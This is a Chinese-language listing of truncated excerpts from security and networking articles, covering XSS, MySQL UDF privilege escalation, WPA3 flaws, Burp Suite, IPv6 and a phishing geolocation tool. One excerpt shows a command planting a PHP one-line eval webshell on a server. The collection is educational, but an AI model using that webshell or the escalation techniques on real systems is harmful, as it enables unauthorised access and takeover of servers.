来自:码农翻身(微信号:coderising) 1. 我把密码献给你 小梁开发了一个“信用卡管家”的程序 , 可以自动从邮箱中读取信用卡相关邮件,分析、汇总,形成一个报表。 小梁找到信用卡达人张大胖试用 : “你的信用卡那么多,看看我这个程序吧, 保准你会爱死它。” 张大胖尝试了几下说: “咦,你...
来自:信安之路(微信号:xazlsec)作者:myh0st经常会有一些从事软件研发或者大学专业是软件工程的朋友,想要从事信息安全行业,但是不知道该怎么学或者怎么从软件开发跨到安全相关的工作,今天大家就来一起讨论一下!想要转行,需要思考几个问题:1、你为什么要转安全?是什么让你有了这个思考?2、你当前...
来自:bigsec岂安科技(微信号:bigsec) 撸主:叶孤城 岂安科技售前顾问 9年互联网项目支持经验,涉猎各类体育项目 无处不在的劫持 利用饿了么2块钱的补差价就能划走用户支付宝的2000元、利用订购的机票信息,就能获取到用户信任,骗取财产、总是被跳转到...
2、udf 提权 UDF 提权是利用 MySQL 的自定义函数功能,将 MySQL 账号转化为系统 system 权限,利用条件的目标系统是 Windows(Win2000/XP/2003);拥有 MySQL 的某个用户账号,此账号必须有对 MySQL 的 insert 和 delete 权限以创...
作者介绍陈小兵,高级工程师,具有丰富的信息系统项目经验及18年以上网络安全经验,现主要从事网络安全及数据库技术研究工作。《黑客攻防及实战案例解析》《Web渗透及实战案例解析》《安全之路-Web渗透及实战案例解析第二版》《黑客攻防实战加密与解密》《网络攻防实战研究:漏洞利用与提权》作者,在国内多本学术...
网络攻击可破坏关键基础设施,中断业务运营,并产生负面新闻报道。有些网络攻击事件还会令公司和公司法人陷入法律纠纷。围绕网络攻击的各种各样因素可对公司企业造成严重伤害,迫使公司支付大笔资金用于数据恢复或IT安全服务以消除影响。 然而,很多公司企业始终无法恢复,他们更有可能一蹶不振,就此破产。为什么网络...
新型DDoS攻击滥用常用HTML5属性导致受害网站瘫痪。 上周,安全公司Imperva报告称发现一起滥用 HTML5 <a>标签 ping 属性的DDoS攻击,4小时内生成了7,000万流量请求。该ping属性旨在供网站用作通告用户跟随页面上给定链接的机制。ping通常只是单次行为,但I...
觉得自己了解恶意软件?恐怕你的恶意软件认知需要更新一下了。如何查找和清除恶意软件也有一些基本的建议可供参考。 安全术语层出不穷,但能够正确分类恶意软件,并知道各类恶意软件的不同传播方式,有助于限制和清除这些作恶的小东西。 下面这份简明恶意软件大全能让你在极客面前都显得很专业。 1. 病毒 计算机病...
两名研究人员发现 WPA3 WiFi 标准包藏5个漏洞,其中4个可对网络安全造成严重威胁。网络信任问题何去何从? WPA3 (Wi-Fi Protected Access 3) 是WiFi联盟开发的最新一代WiFi安全认证,以广泛采纳的WPA2为蓝本,于2018年末推出,被誉为市场上的 “下一代前沿...
来自公众号:良许Linux密码的重要性,相信大家都不言而喻。而密码泄漏或信息泄漏,经常是层出不穷地出现,令人防不胜防。所以,一个强大而复杂的密码是保证自己账户安全的第一步。为了防止信息泄漏,我们可以做些什么呢?密码足够复杂;每个平台密码都不一样,比如QQ,微信,邮箱等;定期更换密码。那怎样的密码才算...
来自:信安之路(微信号:xazlsec)网络端口分两种,一种是实体的端口,也叫接口比如 USB 端口、串型端口等,还有一种网络端口是网络协议规定好的,是虚拟出来完成计算机之间互相通讯的,那么为什么是 65535 而不是更多呢?因为 TCP/IP 协议里规定的啦,规定协议是人定的,当然不是越多越好,够...
随着时间的推移,Web应用漏洞的类型在不断演变,但年复一年持续存在且影响广泛的漏洞仍然还属XSS漏洞。长期以来,XSS漏洞算是非常常见的安全问题,以至于对大多数人来说,即使一个新的XSS漏洞被披露,但从内心来说,早已习已为常。本文深入描述XSS攻击在几种实际环境中的应用,同时顺带提到了一些XSS攻击...
写个php一句话后门上去: [jobcruit@wa64-054 rankup_log]$ echo -e "<?php @eval($_POST[md5])?>" >rankuplog_time.php[jobcruit@wa64-054 rankup_log]$ cat ra...
来自:信安之路(微信号:xazlsec)本文作者:宋斯旸(信安之路特约作者)首先声明,这篇文章在能力不足的前提下并不会帮助你多拿 offer。但对于有一定知识积累,面试总是挂掉的同学会有非常大的提升,本篇文章主要的读者对象是想去大厂尝试 P6-P7 岗位的同学。为啥要写这篇文章去年和今年过了几个大厂...
程序员书库(ID:OpenSourceTop)编译链接:https://cybersecurityventures.com/cybersecurity-book-review/ 猿哥一直都在和大家不断分享有关计算机编程类的好书,因为每个人读书的时间都非常有限,这样做是希望能够帮助读者过滤出最好的书籍...
今天给大家介绍的是一款名叫ISeeYou的强大社工工具,该工具基于Bash和JavaScript开发,可帮助研究人员在进行社工技术测试或网络钓鱼培训过程中快速定位目标用户的确切地理位置。在拿到目标用户的地理位置坐标之后,研究人员就可以对目标用户展开基础的网络侦察活动,并执行进一步的测试。注意1、 在...
问题描述比如Cloudflare,连接用Cloudflare CDN的网站可以看到SSL证书是Cloudflare的证书,所以Cloudflare可以看到所有来往信息。万一Cloudflare CDN服务器安全出问题了,或者Cloudflare本身有一些监控手段,是否意味着存在中间人攻击的安全隐患...
前言本人是一名立志安全开发的大学生,有一年安全测试经验,有时在刷src的时候,需要检查所有target的web业务系统是否泄露敏感目录、文件,工作量十分庞大,于是Dirmap诞生了~知名的web目录文件扫描工具有很多,如:御剑1.5、DirBuster、Dirsearch、cansina。其他开源的...
众所周知,O'Reilly是许多主要技术书籍的出版商,有许多书籍是可供广大读者在线阅读,不过这些书籍都是英文版,本文我们来盘点一下O'Reilly上有关安全的免费书籍: 1、《Cracking Security Misconceptions》随着有关组织和政府部门的安全漏洞示例越来越多,网络安全备受...
1.XSS介绍 跨站脚本攻击,英⽂全称是Cross Site Scripting,为了和前端编程语⾔CSS(Cascading Style Sheet,层叠样式表)有所区别,所以缩写为XSS。XSS是基于客户端的Web攻击,跟SQL注⼊攻击⼀样稳居OWASP前三,危害极⼤。 XSS即攻击者构造脚本(...
1. 越权漏洞简介 在笔者⼼中,逻辑漏洞中最为神秘且强⼤的漏洞,便是越权访问漏洞——⼀个强⼤到若存在,则⼀个普通⽤户也可以控制整个⽹站⽤户数据的漏洞。 越权漏洞的形成,主要是因为开发⼈员在对数据进⾏增、删、改、查询时,对客户端请求的数据过分相信⽽遗漏了权限的判定。所以,测试越权就是和开发⼈员拼细...
历经千辛万苦,终于把IPV6 理论知识讲解完了,今天终于可以开始实操了。前面有介绍到 IPV6 可以自动配置 IP 的功能,那今天就来试试如何让 PC 自动配置 IPV6。另外再研究下在路由器中如何配置 IPV6 的路由协议。 IPV6 地址配置实验: 如上图,两个路由器配置 IPV6 地址,实现...
在前面的章节《IPV6技术 | IPV6的霸气,从“头”开始!》中介绍到了 IPV6 的特有功能,如自动配置,无广播功能等。本章节将对这些 IPV6 的特性的工作原理进行介绍。 本节要介绍的几个 IPV6 特性都跟 IPV6 邻居发现协议有关,称为 NDP 协议,它可以解决如下问题,如下图: 如图...
在上⼀遍⽂章《这份渗透神器Burp Suite使用指南,送给作为新手的你!》中,给⼤家介绍了Burp Suite的安装以及目标模块、代理模块、爬⾍模块。在这篇⽂章中,我们再介绍关于Burp Suite的其他模块以及使⽤⽅法。 1. 扫描功能 扫描模块⽤于⾃动检测漏洞,分为主动扫描和被动扫描。Burp...
▍你知道HTTP访问的交互过程吗? 如题,可能有很多并不了解,本文将简单地介绍一下当你访问某网站时你的电脑与网站之间的数据交互过程。 大家都知道去访问网站都是使用浏览器,在地址栏中输入你想访问的链接,按个回车就能打开相应的网站。然后就可以尽情得浏览网页内容了。 ▍那你知道WEB页面如何呈现的吗? 网...
一谈到加密,想必大部份人第一个想到的应该就是密码,而且很大一部份人应该都认为只要我的密码够复杂就一定安全。 这种想法在大部份地方或时间都适用,但并不是绝对安全,其实安全不光要靠有复杂的密码,还很大程度上倚赖加密算法的完整性或安全性。 下面就来聊聊加密学。 在计算机里,加密方法有很多,常见的加密算法有...
谈到攻击,除了应用层的病毒,蠕虫,木马以外,还有OSI模型谈到的2/3/4层的攻击。对于前者,对付的手段比较麻烦,除了需要强悍的防御外还需要有牛*的杀毒软件,而且还不一定能完全搞定,这块的内容等下期再跟大家聊聊。 这一期咱先来聊聊3/4层的攻击手段与防火墙是如何抵御这些攻击的。 OSI模型中的第三、...
路由协议的加密方法 目前常用的网络路由协议中唯 OSPF 使用最为广泛,但除了 OSPF 协议以外还有其他协议同样被使用。 本文将主要研究这些路由协议中的认证加密问题,在路由认证的过程中所配置的密码到底是否用来加密。在路由协议工作过程中这些报文是如何交互的。 首先,所有的路由协议...